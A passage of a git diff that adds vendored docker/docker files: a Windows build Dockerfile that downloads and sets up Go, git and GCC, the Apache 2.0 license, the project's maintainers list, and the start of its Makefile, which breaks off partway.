+# >> Resolving deltas: 100% (123139/123139), done. +# >> Checking connectivity... done. +# >> Checking out files: 100% (3912/3912), done. +# >> PS C:\> +# +# +# 2. Change directory to the cloned docker sources: +# +# >> cd C:\go\src\github.com\docker\docker +# +# +# 3. Build a docker image with the components required to build the docker binaries from source +# by running one of the following: +# +# >> docker build -t nativebuildimage -f Dockerfile.windows . +# >> docker build -t nativebuildimage -f Dockerfile.windows -m 2GB . (if using Hyper-V containers) +# +# +# 4. Build the docker executable binaries by running one of the following: +# +# >> docker run --name binaries nativebuildimage hack\make.ps1 -Binary +# >> docker run --name binaries -m 2GB nativebuildimage hack\make.ps1 -Binary (if using Hyper-V containers) +# +# +# 5. Copy the binaries out of the container, replacing HostPath with an appropriate destination +# folder on the host system where you want the binaries to be located. +# +# >> docker cp binaries:C:\go\src\github.com\docker\docker\bundles\docker.exe C:\HostPath\docker.exe +# >> docker cp binaries:C:\go\src\github.com\docker\docker\bundles\dockerd.exe C:\HostPath\dockerd.exe +# +# +# 6. (Optional) Remove the interim container holding the built executable binaries: +# +# >> docker rm binaries +# +# +# 7. (Optional) Remove the image used for the container in which the executable +# binaries are build. Tip - it may be useful to keep this image around if you need to +# build multiple times. Then you can take advantage of the builder cache to have an +# image which has all the components required to build the binaries already installed. +# +# >> docker rmi nativebuildimage +# + +# ----------------------------------------------------------------------------------------- + + +# The validation tests can either run in a container, or directly on the host. To run in a +# container, ensure you have created the nativebuildimage above. Then run one of the +# following from an (elevated) Windows PowerShell prompt: +# +# >> docker run --rm nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat +# >> docker run --rm -m 2GB nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat (if using Hyper-V containers) + +# To run the validation tests on the host, from the root of the repository, run the +# following from a Windows PowerShell prompt (elevation is not required): (Note Go +# must be installed to run these tests) +# +# >> hack\make.ps1 -DCO -PkgImports -GoFormat + +# ----------------------------------------------------------------------------------------- + + +# To run unit tests, ensure you have created the nativebuildimage above. Then run one of +# the following from an (elevated) Windows PowerShell prompt: +# +# >> docker run --rm nativebuildimage hack\make.ps1 -TestUnit +# >> docker run --rm -m 2GB nativebuildimage hack\make.ps1 -TestUnit (if using Hyper-V containers) + + +# ----------------------------------------------------------------------------------------- + + +# To run all tests and binary build, ensure you have created the nativebuildimage above. Then +# run one of the following from an (elevated) Windows PowerShell prompt: +# +# >> docker run nativebuildimage hack\make.ps1 -All +# >> docker run -m 2GB nativebuildimage hack\make.ps1 -All (if using Hyper-V containers) + +# ----------------------------------------------------------------------------------------- + + +# Important notes: +# --------------- +# +# Don't attempt to use a bind-mount to pass a local directory as the bundles target +# directory. It does not work (golang attempts for follow a mapped folder incorrectly). +# Instead, use docker cp as per the example. +# +# go.zip is not removed from the image as it is used by the Windows CI servers +# to ensure the host and image are running consistent versions of go. +# +# Nanoserver support is a work in progress. Although the image will build if the +# FROM statement is updated, it will not work when running autogen through hack\make.ps1. +# It is suspected that the required GCC utilities (eg gcc, windres, windmc) silently +# quit due to the use of console hooks which are not available. +# +# The docker integration tests do not currently run in a container on Windows, predominantly +# due to Windows not supporting privileged mode, so anything using a volume would fail. +# They (along with the rest of the docker CI suite) can be run using +# https://github.com/jhowardmsft/docker-w2wCIScripts/blob/master/runCI/Invoke-DockerCI.ps1. +# +# ----------------------------------------------------------------------------------------- + + +# The number of build steps below are explicitly minimised to improve performance. +FROM microsoft/windowsservercore + +# Use PowerShell as the default shell +SHELL ["powershell", "-command"] + +# Environment variable notes: +# - GO_VERSION must be consistent with 'Dockerfile' used by Linux. +# - FROM_DOCKERFILE is used for detection of building within a container. +ENV GO_VERSION=1.7.5 ` + GIT_VERSION=2.11.0 ` + GOPATH=C:\go ` + FROM_DOCKERFILE=1 + +RUN ` + $ErrorActionPreference = 'Stop'; ` + $ProgressPreference = 'SilentlyContinue'; ` + ` + Function Test-Nano() { ` + $EditionId = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name 'EditionID').EditionId; ` + return (($EditionId -eq 'ServerStandardNano') -or ($EditionId -eq 'ServerDataCenterNano') -or ($EditionId -eq 'NanoServer')); ` + }` + ` + Function Download-File([string] $source, [string] $target) { ` + if (Test-Nano) { ` + $handler = New-Object System.Net.Http.HttpClientHandler; ` + $client = New-Object System.Net.Http.HttpClient($handler); ` + $client.Timeout = New-Object System.TimeSpan(0, 30, 0); ` + $cancelTokenSource = [System.Threading.CancellationTokenSource]::new(); ` + $responseMsg = $client.GetAsync([System.Uri]::new($source), $cancelTokenSource.Token); ` + $responseMsg.Wait(); ` + if (!$responseMsg.IsCanceled) { ` + $response = $responseMsg.Result; ` + if ($response.IsSuccessStatusCode) { ` + $downloadedFileStream = [System.IO.FileStream]::new($target, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write); ` + $copyStreamOp = $response.Content.CopyToAsync($downloadedFileStream); ` + $copyStreamOp.Wait(); ` + $downloadedFileStream.Close(); ` + if ($copyStreamOp.Exception -ne $null) { throw $copyStreamOp.Exception } ` + } ` + } else { ` + Throw ("Failed to download " + $source) ` + }` + } else { ` + $webClient = New-Object System.Net.WebClient; ` + $webClient.DownloadFile($source, $target); ` + } ` + } ` + ` + setx /M PATH $('C:\git\bin;C:\git\usr\bin;'+$Env:PATH+';C:\gcc\bin;C:\go\bin'); ` + ` + Write-Host INFO: Downloading git...; ` + $location='https://github.com/git-for-windows/git/releases/download/v'+$env:GIT_VERSION+'.windows.1/PortableGit-'+$env:GIT_VERSION+'-64-bit.7z.exe'; ` + Download-File $location C:\gitsetup.7z.exe; ` + ` + Write-Host INFO: Downloading go...; ` + Download-File $('https://golang.org/dl/go'+$Env:GO_VERSION+'.windows-amd64.zip') C:\go.zip; ` + ` + Write-Host INFO: Downloading compiler 1 of 3...; ` + Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/gcc.zip C:\gcc.zip; ` + ` + Write-Host INFO: Downloading compiler 2 of 3...; ` + Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/runtime.zip C:\runtime.zip; ` + ` + Write-Host INFO: Downloading compiler 3 of 3...; ` + Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/binutils.zip C:\binutils.zip; ` + ` + Write-Host INFO: Installing PS7Zip package...; ` + Install-Package PS7Zip -Force | Out-Null; ` + Write-Host INFO: Importing PS7Zip...; ` + Import-Module PS7Zip -Force; ` + New-Item C:\git -ItemType Directory | Out-Null ; ` + cd C:\git; ` + Write-Host INFO: Extracting git...; ` + Expand-7Zip C:\gitsetup.7z.exe | Out-Null; ` + cd C:\; ` + ` + Write-Host INFO: Expanding go...; ` + Expand-Archive C:\go.zip -DestinationPath C:\; ` + ` + Write-Host INFO: Expanding compiler 1 of 3...; ` + Expand-Archive C:\gcc.zip -DestinationPath C:\gcc -Force; ` + Write-Host INFO: Expanding compiler 2 of 3...; ` + Expand-Archive C:\runtime.zip -DestinationPath C:\gcc -Force; ` + Write-Host INFO: Expanding compiler 3 of 3...; ` + Expand-Archive C:\binutils.zip -DestinationPath C:\gcc -Force; ` + ` + Write-Host INFO: Removing downloaded files...; ` + Remove-Item C:\gcc.zip; ` + Remove-Item C:\runtime.zip; ` + Remove-Item C:\binutils.zip; ` + Remove-Item C:\gitsetup.7z.exe; ` + ` + Write-Host INFO: Creating source directory...; ` + New-Item -ItemType Directory -Path C:\go\src\github.com\docker\docker | Out-Null; ` + ` + Write-Host INFO: Configuring git core.autocrlf...; ` + C:\git\bin\git config --global core.autocrlf true; ` + ` + Write-Host INFO: Completed + +# Make PowerShell the default entrypoint +ENTRYPOINT ["powershell.exe"] + +# Set the working directory to the location of the sources +WORKDIR C:\go\src\github.com\docker\docker + +# Copy the sources into the container +COPY . . diff --git a/vendor/github.com/docker/docker/LICENSE b/vendor/github.com/docker/docker/LICENSE new file mode 100644 index 0000000000..8f3fee627a --- /dev/null +++ b/vendor/github.com/docker/docker/LICENSE @@ -0,0 +1,191 @@ + + Apache License + Version 2.0, January 2004 + https://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + Copyright 2013-2016 Docker, Inc. + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + https://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/vendor/github.com/docker/docker/MAINTAINERS b/vendor/github.com/docker/docker/MAINTAINERS new file mode 100644 index 0000000000..39bb8c1308 --- /dev/null +++ b/vendor/github.com/docker/docker/MAINTAINERS @@ -0,0 +1,376 @@ +# Docker maintainers file +# +# This file describes who runs the docker/docker project and how. +# This is a living document - if you see something out of date or missing, speak up! +# +# It is structured to be consumable by both humans and programs. +# To extract its contents programmatically, use any TOML-compliant +# parser. +# +# This file is compiled into the MAINTAINERS file in docker/opensource. +# +[Org] + + [Org."Core maintainers"] + + # The Core maintainers are the ghostbusters of the project: when there's a problem others + # can't solve, they show up and fix it with bizarre devices and weaponry. + # They have final say on technical implementation and coding style. + # They are ultimately responsible for quality in all its forms: usability polish, + # bugfixes, performance, stability, etc. When ownership can cleanly be passed to + # a subsystem, they are responsible for doing so and holding the + # subsystem maintainers accountable. If ownership is unclear, they are the de facto owners. + + # For each release (including minor releases), a "release captain" is assigned from the + # pool of core maintainers. Rotation is encouraged across all maintainers, to ensure + # the release process is clear and up-to-date. + + people = [ + "aaronlehmann", + "akihirosuda", + "aluzzardi", + "anusha", + "coolljt0725", + "cpuguy83", + "crosbymichael", + "dnephin", + "duglin", + "estesp", + "icecrime", + "jhowardmsft", + "justincormack", + "lk4d4", + "mavenugo", + "mhbauer", + "mlaventure", + "mrjana", + "runcom", + "stevvooe", + "tianon", + "tibor", + "tonistiigi", + "unclejack", + "vdemeester", + "vieux" + ] + + [Org."Docs maintainers"] + + # TODO Describe the docs maintainers role. + + people = [ + "jamtur01", + "misty", + "sven", + "thajeztah" + ] + + [Org.Curators] + + # The curators help ensure that incoming issues and pull requests are properly triaged and + # that our various contribution and reviewing processes are respected. With their knowledge of + # the repository activity, they can also guide contributors to relevant material or + # discussions. + # + # They are neither code nor docs reviewers, so they are never expected to merge. They can + # however: + # - close an issue or pull request when it's an exact duplicate + # - close an issue or pull request when it's inappropriate or off-topic + + people = [ + "aboch", + "andrewhsu", + "ehazlett", + "mgoelzer", + "programmerq", + "thajeztah" + ] + + [Org.Alumni] + + # This list contains maintainers that are no longer active on the project. + # It is thanks to these people that the project has become what it is today. + # Thank you! + + people = [ + # David Calavera contributed many features to Docker, such as an improved + # event system, dynamic configuration reloading, volume plugins, fancy + # new templating options, and an external client credential store. As a + # maintainer, David was release captain for Docker 1.8, and competing + # with Jess Frazelle to be "top dream killer". + # David is now doing amazing stuff as CTO for https://www.netlify.com, + # and tweets as @calavera. + "calavera", + + # As a maintainer, Erik was responsible for the "builder", and + # started the first designs for the new networking model in + # Docker. Erik is now working on all kinds of plugins for Docker + # (https://github.com/contiv) and various open source projects + # in his own repository https://github.com/erikh. You may + # still stumble into him in our issue tracker, or on IRC. + "erikh", + + # Jessica Frazelle, also known as the "Keyser Söze of containers", + # runs *everything* in containers. She started contributing to + # Docker with a (fun fun) change involving both iptables and regular + # expressions (coz, YOLO!) on July 10, 2014 + # https://github.com/docker/docker/pull/6950/commits/f3a68ffa390fb851115c77783fa4031f1d3b2995. + # Jess was Release Captain for Docker 1.4, 1.6 and 1.7, and contributed + # many features and improvement, among which "seccomp profiles" (making + # containers a lot more secure). Besides being a maintainer, she + # set up the CI infrastructure for the project, giving everyone + # something to shout at if a PR failed ("noooo Janky!"). + # Jess is currently working on the DCOS security team at Mesosphere, + # and contributing to various open source projects. + # Be sure you don't miss her talks at a conference near you (a must-see), + # read her blog at https://blog.jessfraz.com (a must-read), and + # check out her open source projects on GitHub https://github.com/jessfraz (a must-try). + "jessfraz", + + # As a docs maintainer, Mary Anthony contributed greatly to the Docker + # docs. She wrote the Docker Contributor Guide and Getting Started + # Guides. She helped create a doc build system independent of + # docker/docker project, and implemented a new docs.docker.com theme and + # nav for 2015 Dockercon. Fun fact: the most inherited layer in DockerHub + # public repositories was originally referenced in + # maryatdocker/docker-whale back in May 2015. + "moxiegirl", + + # Vincent "vbatts!" Batts made his first contribution to the project + # in November 2013, to become a maintainer a few months later, on + # May 10, 2014 (https://github.com/docker/docker/commit/d6e666a87a01a5634c250358a94c814bf26cb778). + # As a maintainer, Vincent made important contributions to core elements + # of Docker, such as "distribution" (tarsum) and graphdrivers (btrfs, devicemapper). + # He also contributed the "tar-split" library, an important element + # for the content-addressable store. + # Vincent is currently a member of the Open Containers Initiative + # Technical Oversight Board (TOB), besides his work at Red Hat and + # Project Atomic. You can still find him regularly hanging out in + # our repository and the #docker-dev and #docker-maintainers IRC channels + # for a chat, as he's always a lot of fun. + "vbatts", + + # Vishnu became a maintainer to help out on the daemon codebase and + # libcontainer integration. He's currently involved in the + # Open Containers Initiative, working on the specifications, + # besides his work on cAdvisor and Kubernetes for Google. + "vishh" + ] + +[people] + +# A reference list of all people associated with the project. +# All other sections should refer to people by their canonical key +# in the people section. + + # ADD YOURSELF HERE IN ALPHABETICAL ORDER + + [people.aaronlehmann] + Name = "Aaron Lehmann" + Email = "aaron.lehmann@docker.com" + GitHub = "aaronlehmann" + + [people.aboch] + Name = "Alessandro Boch" + Email = "aboch@docker.com" + GitHub = "aboch" + + [people.akihirosuda] + Name = "Akihiro Suda" + Email = "suda.akihiro@lab.ntt.co.jp" + GitHub = "AkihiroSuda" + + [people.aluzzardi] + Name = "Andrea Luzzardi" + Email = "al@docker.com" + GitHub = "aluzzardi" + + [people.andrewhsu] + Name = "Andrew Hsu" + Email = "andrewhsu@docker.com" + GitHub = "andrewhsu" + + [people.anusha] + Name = "Anusha Ragunathan" + Email = "anusha@docker.com" + GitHub = "anusha-ragunathan" + + [people.calavera] + Name = "David Calavera" + Email = "david.calavera@gmail.com" + GitHub = "calavera" + + [people.coolljt0725] + Name = "Lei Jitang" + Email = "leijitang@huawei.com" + GitHub = "coolljt0725" + + [people.cpuguy83] + Name = "Brian Goff" + Email = "cpuguy83@gmail.com" + Github = "cpuguy83" + + [people.crosbymichael] + Name = "Michael Crosby" + Email = "crosbymichael@gmail.com" + GitHub = "crosbymichael" + + [people.dnephin] + Name = "Daniel Nephin" + Email = "dnephin@gmail.com" + GitHub = "dnephin" + + [people.duglin] + Name = "Doug Davis" + Email = "dug@us.ibm.com" + GitHub = "duglin" + + [people.ehazlett] + Name = "Evan Hazlett" + Email = "ejhazlett@gmail.com" + GitHub = "ehazlett" + + [people.erikh] + Name = "Erik Hollensbe" + Email = "erik@docker.com" + GitHub = "erikh" + + [people.estesp] + Name = "Phil Estes" + Email = "estesp@linux.vnet.ibm.com" + GitHub = "estesp" + + [people.icecrime] + Name = "Arnaud Porterie" + Email = "arnaud@docker.com" + GitHub = "icecrime" + + [people.jamtur01] + Name = "James Turnbull" + Email = "james@lovedthanlost.net" + GitHub = "jamtur01" + + [people.jhowardmsft] + Name = "John Howard" + Email = "jhoward@microsoft.com" + GitHub = "jhowardmsft" + + [people.jessfraz] + Name = "Jessie Frazelle" + Email = "jess@linux.com" + GitHub = "jessfraz" + + [people.justincormack] + Name = "Justin Cormack" + Email = "justin.cormack@docker.com" + GitHub = "justincormack" + + [people.lk4d4] + Name = "Alexander Morozov" + Email = "lk4d4@docker.com" + GitHub = "lk4d4" + + [people.mavenugo] + Name = "Madhu Venugopal" + Email = "madhu@docker.com" + GitHub = "mavenugo" + + [people.mgoelzer] + Name = "Mike Goelzer" + Email = "mike.goelzer@docker.com" + GitHub = "mgoelzer" + + [people.mhbauer] + Name = "Morgan Bauer" + Email = "mbauer@us.ibm.com" + GitHub = "mhbauer" + + [people.misty] + Name = "Misty Stanley-Jones" + Email = "misty@docker.com" + GitHub = "mstanleyjones" + + [people.mlaventure] + Name = "Kenfe-Mickaël Laventure" + Email = "mickael.laventure@docker.com" + GitHub = "mlaventure" + + [people.moxiegirl] + Name = "Mary Anthony" + Email = "mary.anthony@docker.com" + GitHub = "moxiegirl" + + [people.mrjana] + Name = "Jana Radhakrishnan" + Email = "mrjana@docker.com" + GitHub = "mrjana" + + [people.programmerq] + Name = "Jeff Anderson" + Email = "jeff@docker.com" + GitHub = "programmerq" + + [people.runcom] + Name = "Antonio Murdaca" + Email = "runcom@redhat.com" + GitHub = "runcom" + + [people.shykes] + Name = "Solomon Hykes" + Email = "solomon@docker.com" + GitHub = "shykes" + + [people.stevvooe] + Name = "Stephen Day" + Email = "stephen.day@docker.com" + GitHub = "stevvooe" + + [people.sven] + Name = "Sven Dowideit" + Email = "SvenDowideit@home.org.au" + GitHub = "SvenDowideit" + + [people.thajeztah] + Name = "Sebastiaan van Stijn" + Email = "github@gone.nl" + GitHub = "thaJeztah" + + [people.tianon] + Name = "Tianon Gravi" + Email = "admwiggin@gmail.com" + GitHub = "tianon" + + [people.tibor] + Name = "Tibor Vass" + Email = "tibor@docker.com" + GitHub = "tiborvass" + + [people.tonistiigi] + Name = "Tõnis Tiigi" + Email = "tonis@docker.com" + GitHub = "tonistiigi" + + [people.unclejack] + Name = "Cristian Staretu" + Email = "cristian.staretu@gmail.com" + GitHub = "unclejack" + + [people.vbatts] + Name = "Vincent Batts" + Email = "vbatts@redhat.com" + GitHub = "vbatts" + + [people.vdemeester] + Name = "Vincent Demeester" + Email = "vincent@sbr.pm" + GitHub = "vdemeester" + + [people.vieux] + Name = "Victor Vieux" + Email = "vieux@docker.com" + GitHub = "vieux" + + [people.vishh] + Name = "Vishnu Kannan" + Email = "vishnuk@google.com" + GitHub = "vishh" diff --git a/vendor/github.com/docker/docker/Makefile b/vendor/github.com/docker/docker/Makefile new file mode 100644 index 0000000000..81bde6b4f6 --- /dev/null +++ b/vendor/github.com/docker/docker/Makefile @@ -0,0 +1,147 @@ +.PHONY: all binary build cross deb help init-go-pkg-cache install manpages rpm run shell test test-docker-py test-integration-cli test-unit tgz validate win + +# set the graph driver as the current graphdriver if not set +DOCKER_GRAPHDRIVER := $(if $(DOCKER_GRAPHDRIVER),$(DOCKER_GRAPHDRIVER),$(shell docker info 2>&1 | grep "Storage Driver" | sed 's/.*: //')) + +# get OS/Arch of docker engine +DOCKER_OSARCH := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKER_ENGINE_OSARCH:-$$DOCKER_CLIENT_OSARCH}') +DOCKERFILE := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKERFILE}') + +# env vars passed through directly to Docker's build scripts +# to allow things like `make KEEPBUNDLE=1 binary` easily +# `project/PACKAGERS.md` have some limited documentation of some of these +DOCKER_ENVS := \ + -e BUILD_APT_MIRROR \ + -e BUILDFLAGS \ + -e KEEPBUNDLE \ + -e DOCKER_BUILD_ARGS \ + -e DOCKER_BUILD_GOGC \ + -e DOCKER_BUILD_PKGS \ + -e DOCKER_DEBUG \ + -e DOCKER_EXPERIMENTAL \ + -e DOCKER_GITCOMMIT \ + -e DOCKER_GRAPHDRIVER=$(DOCKER_GRAPHDRIVER) \ + -e DOCKER_INCREMENTAL_BINARY \ + -e DOCKER_PORT \ + -e DOCKER_REMAP_ROOT \ + -e DOCKER_STORAGE_OPTS \ + -e DOCKER_USERLANDPROXY \ + -e TESTDIRS \ + -e TESTFLAGS \ + -e TIMEOUT \ + -e HTTP_PROXY \ + -e HTTPS_PROXY \ + -e NO_PROXY \ + -e http_proxy \ + -e https_proxy \ + -e no_proxy +# note: we _cannot_ add "-e DOCKER_BUILDTAGS" here because even if it's unset in the shell, that would shadow the "ENV DOCKER_BUILDTAGS" set in our Dockerfile, which is very important for our official builds + +# to allow `make BIND_DIR=. shell` or `make BIND_DIR= test` +# (default to no bind mount if DOCKER_HOST is set) +# note: BINDDIR is supported for backwards-compatibility here +BIND_DIR := $(if $(BINDDIR),$(BINDDIR),$(if $(DOCKER_HOST),,bundles)) +DOCKER_MOUNT := $(if $(BIND_DIR),-v "$(CURDIR)/$(BIND_DIR):/go/src/github.com/docker/docker/$(BIND_DIR)") + +# This allows the test suite to be able to run without worrying about the underlying fs used by the container running the daemon (e.g. aufs-on-aufs), so long as the host running the container is running a supported fs. +# The volume will be cleaned up when the container is removed due to `--rm`. +# Note that `BIND_DIR` will already be set to `bundles` if `DOCKER_HOST` is not set (see above BIND_DIR line), in such case this will do nothing since `DOCKER_MOUNT` will already be set. +DOCKER_MOUNT := $(if $(DOCKER_MOUNT),$(DOCKER_MOUNT),-v /go/src/github.com/docker/docker/bundles) + +# enable .go-pkg-cache if DOCKER_INCREMENTAL_BINARY and DOCKER_MOUNT (i.e.DOCKER_HOST) are set +PKGCACHE_DIR := $(if $(PKGCACHE_DIR),$(PKGCACHE_DIR),.go-pkg-cache) +PKGCACHE_MAP := gopath:/go/pkg goroot-linux_amd64_netgo:/usr/local/go/pkg/linux_amd64_netgo +DOCKER_MOUNT := $(if $(DOCKER_INCREMENTAL_BINARY),$(DOCKER_MOUNT) $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^ ]*)@-v "$(CURDIR)/$(PKGCACHE_DIR)/\1"@g'),$(DOCKER_MOUNT)) + +GIT_BRANCH := $(shell git rev-parse --abbrev-ref HEAD 2>/dev/null) +GIT_BRANCH_CLEAN := $(shell echo $(GIT_BRANCH) | sed -e "s/[^[:alnum:]]/-/g") +DOCKER_IMAGE := docker-dev$(if $(GIT_BRANCH_CLEAN),:$(GIT_BRANCH_CLEAN)) +DOCKER_PORT_FORWARD := $(if $(DOCKER_PORT),-p "$(DOCKER_PORT)",) + +DOCKER_FLAGS := docker run --rm -i --privileged $(DOCKER_ENVS) $(DOCKER_MOUNT) $(DOCKER_PORT_FORWARD) +BUILD_APT_MIRROR := $(if $(DOCKER_BUILD_APT_MIRROR),--build-arg APT_MIRROR=$(DOCKER_BUILD_APT_MIRROR)) +export BUILD_APT_MIRROR + +# if this session isn't interactive, then we don't want to allocate a +# TTY, which would fail, but if it is interactive, we do want to attach +# so that the user can send e.g. ^C through. +INTERACTIVE := $(shell [ -t 0 ] && echo 1 || echo 0) +ifeq ($(INTERACTIVE), 1) + DOCKER_FLAGS += -t +endif + +DOCKER_RUN_DOCKER := $(DOCKER_FLAGS) "$(DOCKER_IMAGE)" + +default: binary + +all: build ## validate all checks, build linux binaries, run all tests\ncross build non-linux binaries and generate archives + $(DOCKER_RUN_DOCKER) bash -c 'hack/validate/default && hack/make.sh' + +binary: build ## build the linux binaries + $(DOCKER_RUN_DOCKER) hack/make.sh binary + +build: bundles init-go-pkg-cache + docker build ${BUILD_APT_MIRROR} ${DOCKER_BUILD_ARGS} -t "$(DOCKER_IMAGE)" -f "$(DOCKERFILE)" . + +bundles: + mkdir bundles + +cross: build ## cross build the binaries for darwin, freebsd and\nwindows + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross + +deb: build ## build the deb packages + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-deb + + +help: ## this help + @awk 'BEGIN {FS = ":.*?## "} /^[a-zA-Z_-]+:.*?## / {sub("\\\\n",sprintf("\n%22c"," "), $$2);printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}' $(MAKEFILE_LIST) + +init-go-pkg-cache: + mkdir -p $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^: ]*):[^ ]*@$(PKGCACHE_DIR)/\1@g') + +install: ## install the linux binaries + KEEPBUNDLE=1 hack/make.sh install-binary + +manpages: ## Generate man pages from go source and markdown + docker build -t docker-manpage-dev -f "man/$(DOCKERFILE)" ./man + docker run --rm \ + -v $(PWD):/go/src/github.com/docker/docker/ \ + docker-manpage-dev + +rpm: build ## build the rpm packages + 